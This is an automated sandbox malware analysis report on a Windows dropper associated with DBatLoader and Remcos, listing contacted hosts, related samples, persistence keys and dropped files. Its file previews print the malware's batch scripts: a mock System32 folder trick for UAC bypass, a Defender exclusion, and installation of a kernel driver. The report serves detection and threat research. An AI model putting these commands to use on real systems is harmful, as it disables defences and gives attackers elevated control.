http://ocsp.sectigo.com0C	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	false	Avira URL Cloud: safe	unknown
http://cps.root-x1.letsencrypt.org0	srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1881543836.0000000036210000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003003A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.pmail.com0	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1708520498.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1681956629.0000000022551000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1682687395.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705852154.00000000225FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1838777437.0000000002A16000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1907994741.0000000002A96000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.139.11	dual-spov-0006.spov-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.56.136.50	oripam.xyz	Malta	60558	SECUREDSERVERS-EU	true
173.231.16.75	api4.ipify.org	United States	18450	WEBNXUS	false

General Information

Joe Sandbox version:	39.0.0 Ruby
Analysis ID:	1380665
Start date and time:	2024-01-24 21:31:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@16/9@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 91% Number of executed functions: 151 Number of non-executed functions: 140
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.12
Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-sn-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-sn-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Simulations

Behavior and APIs

Time	Type	Description
20:32:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Clmgncrs C:\Users\Public\Clmgncrs.url
20:32:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Clmgncrs C:\Users\Public\Clmgncrs.url
21:31:54	API Interceptor	2x Sleep call for process: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe modified
21:32:02	API Interceptor	150605x Sleep call for process: srcngmlC.pif modified
21:32:10	API Interceptor	2x Sleep call for process: Clmgncrs.PIF modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.107.139.11	SCAN_DSC0027929829.PDF..exe	Get hash	malicious	Remcos, DBatLoader	Browse
	DF0987890000.scr.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	fBb1IzrM3E.exe	Get hash	malicious	DBatLoader	Browse
	Znokqyctuubnie.exe	Get hash	malicious	DBatLoader	Browse
	3002918291829182.exe	Get hash	malicious	DBatLoader	Browse
	PI_and_payment_confirmed.exe	Get hash	malicious	DBatLoader	Browse
	best.exe	Get hash	malicious	GuLoader, Remcos	Browse
	Stmt_2024-01.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	fattura proforma pdf.exe.xz	Get hash	malicious	DBatLoader, FormBook	Browse
	https://1drv.ms/b/s!AtS4AT1e0BnKbeR4gH9MVXH2aYA	Get hash	malicious	Unknown	Browse
185.56.136.50	HJT3fdlBod.exe	Get hash	malicious	GuLoader	Browse	timefrieghts.com/wp-content/plugins/wpcargo/includes/config/binned_iZyvWaLXE113.bin
173.231.16.75	rnarud__ba20226_.exe	Get hash	malicious	AgentTesla	Browse
	HS44892321-T01.exe	Get hash	malicious	AgentTesla	Browse
	https://bafybeif2sotnvj6iazxaiz45l2jhmichgbvys2bccs2di4oolslqz5kk7a.ipfs.cf-ipfs.com/?accounts.intuit.com/app/sign-in	Get hash	malicious	HTMLPhisher	Browse
	Purchase_Order.5643.exe	Get hash	malicious	AgentTesla	Browse
	Quote_220124.exe	Get hash	malicious	AgentTesla	Browse
	#U03a0#U0391#U03a1#U0391#U0393#U0393#U0395#U039b5500001213#U0399#U0391.exe	Get hash	malicious	AgentTesla	Browse
	AwvDzosFPVPCmA2.exe	Get hash	malicious	AgentTesla	Browse
	shipping_documents_PI_MLM_MAMM0012.pdf.exe	Get hash	malicious	AgentTesla	Browse
	FUCHUNQUOTE04830A.exe	Get hash	malicious	AgentTesla	Browse
	SWF316012401180017.PDF.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dual-spov-0006.spov-msedge.net	SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	SCAN_DSC0027929829.PDF..exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.139.11
	DF0987890000.scr.exe	Get hash	malicious	DBatLoader, Remcos	Browse	13.107.137.11
	fBb1IzrM3E.exe	Get hash	malicious	DBatLoader	Browse	13.107.139.11
	Znokqyctuubnie.exe	Get hash	malicious	DBatLoader	Browse	13.107.139.11
	3002918291829182.exe	Get hash	malicious	DBatLoader	Browse	13.107.137.11
	PI_and_payment_confirmed.exe	Get hash	malicious	DBatLoader	Browse	13.107.137.11
	best.exe	Get hash	malicious	GuLoader, Remcos	Browse	13.107.139.11
	Stmt_2024-01.exe	Get hash	malicious	DBatLoader, Remcos	Browse	13.107.139.11
	fattura proforma pdf.exe.xz	Get hash	malicious	DBatLoader, FormBook	Browse	13.107.139.11
api4.ipify.org	rnarud__ba20226_.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	rSOA(PLWW)-Jan2024.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.156
	G9iohzB8uV.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.156
	HS44892321-T01.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	https://bafybeif2sotnvj6iazxaiz45l2jhmichgbvys2bccs2di4oolslqz5kk7a.ipfs.cf-ipfs.com/?accounts.intuit.com/app/sign-in	Get hash	malicious	HTMLPhisher	Browse	64.185.227.156
	Purchase_Order.5643.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	MAEU233851403_VerifyCopy.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.156
	BorradorRenta.xlsm	Get hash	malicious	Unknown	Browse	104.237.62.211
	PO22134.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.156
	Ordine_nr._D12201437_pdf_.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SECUREDSERVERS-EU	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	185.52.54.43
	DOCS.exe	Get hash	malicious	AgentTesla	Browse	185.56.136.50
	SecuriteInfo.com.Win32.PWSX-gen.15104.27349.exe	Get hash	malicious	AgentTesla	Browse	185.56.136.50
	SecuriteInfo.com.Win32.PWSX-gen.6174.27930.exe	Get hash	malicious	AgentTesla	Browse	185.56.136.50
	SHIPPING-DOCS.exe	Get hash	malicious	AgentTesla, DBatLoader, RedLine, zgRAT	Browse	185.56.136.50
	INQUIRY7908-PDF.exe	Get hash	malicious	AgentTesla, DBatLoader, RedLine, zgRAT	Browse	185.56.136.50
	SecuriteInfo.com.Win32.DropperX-gen.13470.11348.exe	Get hash	malicious	AgentTesla, DBatLoader, RedLine, zgRAT	Browse	185.56.136.50
	DOC001.exe	Get hash	malicious	AgentTesla	Browse	185.56.136.50
	PO9823.exe	Get hash	malicious	AgentTesla, DBatLoader, RedLine, zgRAT	Browse	185.56.136.50
	x86_64.elf	Get hash	malicious	Mirai	Browse	131.153.16.206
WEBNXUS	rnarud__ba20226_.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	rSOA(PLWW)-Jan2024.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.156
	G9iohzB8uV.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.156
	HS44892321-T01.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	https://bafybeif2sotnvj6iazxaiz45l2jhmichgbvys2bccs2di4oolslqz5kk7a.ipfs.cf-ipfs.com/?accounts.intuit.com/app/sign-in	Get hash	malicious	HTMLPhisher	Browse	64.185.227.156
	Purchase_Order.5643.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	MAEU233851403_VerifyCopy.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.156
	BorradorRenta.xlsm	Get hash	malicious	Unknown	Browse	104.237.62.211
	PO22134.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.156
	Ordine_nr._D12201437_pdf_.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211
MICROSOFT-CORP-MSN-AS-BLOCKUS	Clint Helton shared Dynagrid Construction LLC with you (22.5 KB).msg	Get hash	malicious	SharepointPhisher	Browse	52.109.8.89
	bThK.exe	Get hash	malicious	Njrat	Browse	20.234.71.164
	Superior Case #SUCV2023050745 PeachCourt Notifications From LAW FIRM - 3 page(s).msg	Get hash	malicious	HTMLPhisher	Browse	104.47.64.28
	https://upvir.al/154980/lp154980	Get hash	malicious	HTMLPhisher	Browse	52.96.173.178
	https://2n8w.app.link/?~channel=Email&~feature=ConfirmationEmail--AtocETicket&~campaign=WebToApp&~tags=locale%3Den_GB&~tags=version%3D1&~tags=marketing_code%3DBSH3675&$android_url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.thetrainline%26hl%3Den-GB&$android_deepview=false&$android_passive_deepview=false&$ios_url=https%3A%2F%2Fitunes.apple.com%2FGB%2Fapp%2Fthetrainline%2Fid334235181&$ios_deepview=false&$ios_passive_deepview=false&$fallback_url=http://schools.ph/laku/mako/wqowc8/sergio.tortola@cellnextelecom.com	Get hash	malicious	HTMLPhisher	Browse	52.96.119.82
	https://www.google.com/url?q=https%3A%2F%2Fcollectivedoc.top%2Fz32t5p3%2F&sa=D&sntz=1&usg=AOvVaw30zt8WoGNzb9nnVGI9mZyR	Get hash	malicious	HTMLPhisher	Browse	13.107.213.40
	Bjrfyyjj.exe	Get hash	malicious	DBatLoader, Remcos	Browse	150.171.43.11
	https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//bridgemediaads.co.za/htm/ssl/http/K1YBQ7DVK5OPXN7DIZDU0G2W0I_=/.filepage/vivi//yu@tru.ca	Get hash	malicious	HTMLPhisher	Browse	13.107.213.40
	readme.dll	Get hash	malicious	CobaltStrike	Browse	20.69.178.82
	https://gqmimgoffer.blob.core.windows.net/gqmimgoffer/url.html#cl/10174_md/2001/7684/1802/153/180101	Get hash	malicious	Phisher	Browse	20.209.1.65

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	rnarud__ba20226_.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	rSOA(PLWW)-Jan2024.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	G9iohzB8uV.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	https://northindiasf.com/index.html	Get hash	malicious	Phisher	Browse	173.231.16.75
	HS44892321-T01.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	how to do self attested on documents 82699.js	Get hash	malicious	Unknown	Browse	173.231.16.75
	how to do self attested on documents 82699.js	Get hash	malicious	Unknown	Browse	173.231.16.75
	http://abyssalforge.top	Get hash	malicious	Unknown	Browse	173.231.16.75
	https://www.google.com/url?q=https%3A%2F%2Fcollectivedoc.top%2Fz32t5p3%2F&sa=D&sntz=1&usg=AOvVaw30zt8WoGNzb9nnVGI9mZyR	Get hash	malicious	HTMLPhisher	Browse	173.231.16.75
	Purchase_Order.5643.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
a0e9f5d64349fb13191bc781f81f42e1	Bjrfyyjj.exe	Get hash	malicious	DBatLoader, Remcos	Browse	13.107.139.11
	Invoice 23457538_PDF.vbs	Get hash	malicious	AsyncRAT, XWorm	Browse	13.107.139.11
	file.exe	Get hash	malicious	LummaC	Browse	13.107.139.11
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	13.107.139.11
	prezi-windows.exe	Get hash	malicious	Unknown	Browse	13.107.139.11
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar	Browse	13.107.139.11
	prezi-windows.exe	Get hash	malicious	Unknown	Browse	13.107.139.11
	BILL47189.js	Get hash	malicious	NetSupport RAT	Browse	13.107.139.11
	8XLr3uh4bB.exe	Get hash	malicious	Amadey, RisePro Stealer, Xmrig	Browse	13.107.139.11
	https://help-users-solve-problems-c8a.netlify.app/	Get hash	malicious	Unknown	Browse	13.107.139.11

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\netutils.dll	Bjrfyyjj.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	PCMNil7wkU.exe	Get hash	malicious	AgentTesla, AsyncRAT, DBatLoader, RedLine	Browse
	SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	SCAN_DSC0027929829.PDF..exe	Get hash	malicious	Remcos, DBatLoader	Browse
	DF0987890000.scr.exe	Get hash	malicious	DBatLoader, Remcos	Browse
C:\Users\Public\Libraries\easinvoker.exe	Bjrfyyjj.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	PCMNil7wkU.exe	Get hash	malicious	AgentTesla, AsyncRAT, DBatLoader, RedLine	Browse
	SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	SCAN_DSC0027929829.PDF..exe	Get hash	malicious	Remcos, DBatLoader	Browse
	DF0987890000.scr.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	Stmt_2024-01.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	Invoice0017861201.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Order151smapl.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	n6dS0UI5yA.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Haziran-Aral#U0131k_Eksik_Evrak_Raporu.exe	Get hash	malicious	DBatLoader	Browse

Created / dropped Files

C:\Users\Public\Clmgncrs.url

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Clmgncrs.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	5.037404160633783
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMXECSsb5itKPn:HRYFVmTWDyz8ZSE5OKPn
MD5:	A2A649BB289C50B292C5778F7D723B26
SHA1:	3B92394E450C898E97E31B1F8CF9FEBC3F959E0A
SHA-256:	09E0C96ECBEA303E794BCF9E90B4D69067576784D8D08F51B4B26F722A5B28C3
SHA-512:	7436C780AB3463A50E35CE15532F6063DF9CA21412B80780CF776BB4EEE3F010D52A399227EEFE931ECC316BDBE4E7F559C76F26C43ABC0F9DCDA3BD63C2DF6C
Malicious:	false
Reputation:	low
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Clmgncrs.PIF"..IconIndex=12..HotKey=98..

C:\Users\Public\Libraries\Clmgncrs.PIF

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1693184
Entropy (8bit):	7.4228083954221695
Encrypted:	false
SSDEEP:	24576:iyB7eQVOovzwkKEFL3WlrpY7Gv1eeajEja3KgffHCx2GwV/6ltVIaH3:D9VmuL3WZ7vcVjEvGHaKViFJ3
MD5:	39AD433C9BA920E7FD0961C66AC7079E
SHA1:	8A54961347EAB2253E2004E33F399C4CD07C8577
SHA-256:	E1471B0576C26D33B4FDA732A7E0ABA43193849EF1DE6BBCDD42E8724354DD00
SHA-512:	676DA03F46446AD3A6E83E7B0D6648E6C82E25D0866FBE13F85EA0A3EC6FFB9FB507B28AE69638A4CF62D51B0AEFB934BD20D77605A78D1F8652EF2FD5D38B71
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................@....................@..........................p...................@...............................%...@..........................da..................................................8................................text............................... ..`.itext.............................. ..`.data...............................@....bss....p6...@...........................idata...%.......&..................@....tls....4............D...................rdata...............D..............@..@.reloc..da.......b...F..............@..B.rsrc........@......................@..@.............p......................@..@................................................................................................

C:\Users\Public\Libraries\ClmgncrsO.bat

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	404
Entropy (8bit):	5.010767804598093
Encrypted:	false
SSDEEP:	6:rT4etMs2cLv0Y/T2cLZ9ULT2cLZthGKFIs2cLZXIs2cLZWKmxkv:f4etMXK0Yi5L60GeWbRKZv
MD5:	6880148D6CD8FABDCE94B7E91DBD8D17
SHA1:	870E9AD13355A8452746E0904D004EE8C8EC66E5
SHA-256:	0BFE311FFB1DE96CBB2616C2A59C2A1A4942EC03073CC2DDFDFC43F79C74D18A
SHA-512:	810EE2896597CBCF813B9285BB2D7F9127360A4D8A872C47460D32710FE114C27ED58F840DC8BCFDAF7B826E7E46C78C0E814E4FA3D380D10737673A1FEBF38E
Malicious:	false
Reputation:	low
Preview:	start /min cmd /c mkdir "\\?\C:\Windows " &..mkdir "\\?\C:\Windows \System32" &..ECHO F\|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y &..ECHO F\|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y &..ECHO F\|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y &..ECHO F\|xcopy "x.bat" "C:\Windows \System32\" /K /D /H /Y &.."C:\\Windows \\System32\\easinvoker.exe" &..EXIT ......

C:\Users\Public\Libraries\KDECO.bat

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	271
Entropy (8bit):	4.820351746235622
Encrypted:	false
SSDEEP:	6:rYGnyiMMQ75ieGgdEYlRALolXlXINbaH1BYPWND1Qozn:8GnGMQ7hu+m2XlXI+BYONe2
MD5:	D62B11DC4DC821EF23260E5B0E74A835
SHA1:	CDFF2004CB9EF149F75FAE296F50F4FBFEFB2E84
SHA-256:	D1B19B878A3AE98F650843314CC3EF8D681013F6E18E0201CB47A0AFA45FC349
SHA-512:	27B8292EB318413B965E1C7552165E65F9003D03B15DDC0C5C142420A1A174303F983C268942D7B60C74AC4E8E79E01F83510807FC0C492CABDF4948BC69C625
Malicious:	false
Reputation:	low
Preview:	start /min cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & ..sc.exe create truesight binPath="C:\Users\Public\Libraries\truesight.sys" type=kernel &..sc.exe start truesight &..exit....

C:\Users\Public\Libraries\Null

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:Svn:Svn
MD5:	183EE5C38F5718616E4D909D5298B395
SHA1:	B7966E63431A31FFE6CB52BFD4A444AFC57C2F0B
SHA-256:	8CE88A8842C1584E3D6871E84E166E3B513C3CE2A9DA6166760C7AF1645DEA29
SHA-512:	5ED5220EFF4DBAD962E3675234B322EE728584E9EF561A4D973AEF614EA2E96D9E68BD20A729CF4D4CDEE685EC347452AFE6AC0DC1B0AC426721D50CA6F666AF
Malicious:	false
Preview:	20..

C:\Users\Public\Libraries\easinvoker.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131648
Entropy (8bit):	5.225468064273746
Encrypted:	false
SSDEEP:	3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5:	231CE1E1D7D98B44371FFFF407D68B59
SHA1:	25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256:	30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512:	520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Bjrfyyjj.exe, Detection: malicious, Browse Filename: PCMNil7wkU.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe, Detection: malicious, Browse Filename: SCAN_DSC0027929829.PDF..exe, Detection: malicious, Browse Filename: DF0987890000.scr.exe, Detection: malicious, Browse Filename: Stmt_2024-01.exe, Detection: malicious, Browse Filename: Invoice0017861201.exe, Detection: malicious, Browse Filename: Order151smapl.exe, Detection: malicious, Browse Filename: n6dS0UI5yA.exe, Detection: malicious, Browse Filename: Haziran-Aral#U0131k_Eksik_Evrak_Raporu.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

C:\Users\Public\Libraries\netutils.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	117430
Entropy (8bit):	5.039733311717682
Encrypted:	false
SSDEEP:	1536:M8ypRiBID3TfyIIXt/9msamG+A5j/oSnKAf0H1Cl7MbiRUiRdI8a9pFpF:M8ypRiK/S/9zG++7nKAf0HfiRdI8khF
MD5:	96B99E2A886D816C1B98B018ADFE6311
SHA1:	41F2F29BD8F366781ED1387068150EB2789DBBF8
SHA-256:	C300A049564EEF6D8BAA136858F1F6F0779003BD1B566D95689883C6935E2BA6
SHA-512:	6768632B586123B4B7C452C05B871A2474214A5D7DB4A048F7B67BC2CDA9DBF87C2EFAF18BED86666DC145F948A2EDBE3B01949FB75E6A68D813CD18A62BA45A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: Bjrfyyjj.exe, Detection: malicious, Browse Filename: PCMNil7wkU.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe, Detection: malicious, Browse Filename: SCAN_DSC0027929829.PDF..exe, Detection: malicious, Browse Filename: DF0987890000.scr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........\......... ..... ...$................<a............................. ................ ..............................................................P..................\........................... ...(................................................................... .................. .P`.............0.......*..............@.p..............@.......2..............@.P@.............P.......8..............@.0@.............`.......<..............@.0@.............p........................p......................>..............@.0@.....................@..............@.0.........X............H..............@.@.........h............J..............@.`.........\............L..............@.0B/4...................N..............@.PB/19..................R..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

C:\Users\Public\Libraries\srcngmlC.pif

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
